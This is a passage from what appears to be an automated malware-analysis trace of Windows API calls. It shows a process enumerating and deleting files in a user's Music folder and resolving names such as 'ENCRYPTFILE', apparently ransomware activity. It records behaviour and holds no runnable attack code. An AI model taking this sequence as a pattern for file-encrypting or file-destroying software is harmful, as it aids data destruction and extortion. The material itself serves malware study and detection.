lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69ef1cc0, ftCreationTime.dwHighDateTime=0x1d5e373, ftLastAccessTime.dwLowDateTime=0x5d4774b0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0x5d4774b0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x17844, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="caX1anHBaP9sA34Tftcq.mp3", cAlternateFileName="CAX1AN~1.MP3")) returned 0x41ac500 [0117.705] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\cax1anhbap9sa34tftcq.mp3")) returned 1 [0117.753] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69ef1cc0, ftCreationTime.dwHighDateTime=0x1d5e373, ftLastAccessTime.dwLowDateTime=0x5d4774b0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0x5d4774b0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x17844, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="caX1anHBaP9sA34Tftcq.mp3", cAlternateFileName="CAX1AN~1.MP3")) returned 0 [0117.754] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.754] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0117.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0117.754] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4314a28 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0117.755] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0117.755] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0117.755] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0117.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0117.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0117.756] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0117.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.756] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0117.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0117.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0117.757] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e1cd10, ftCreationTime.dwHighDateTime=0x1d5ea0e, ftLastAccessTime.dwLowDateTime=0x70eb26c0, ftLastAccessTime.dwHighDateTime=0x1d5e7df, ftLastWriteTime.dwLowDateTime=0x70eb26c0, ftLastWriteTime.dwHighDateTime=0x1d5e7df, nFileSizeHigh=0x0, nFileSizeLow=0x43ef, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="TFaPhwZGXS0zM.wav", cAlternateFileName="TFAPHW~1.WAV")) returned 0x41ac280 [0117.757] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0117.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0117.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0117.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0117.757] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0117.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0117.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0117.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0117.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f50 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0117.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.758] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0117.758] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0117.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0117.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0117.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0117.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0117.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0117.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0117.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0117.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0117.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0117.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0117.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0117.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0117.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0117.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0117.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0117.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0117.761] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0117.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0117.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0117.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0117.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0117.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0117.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0117.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) 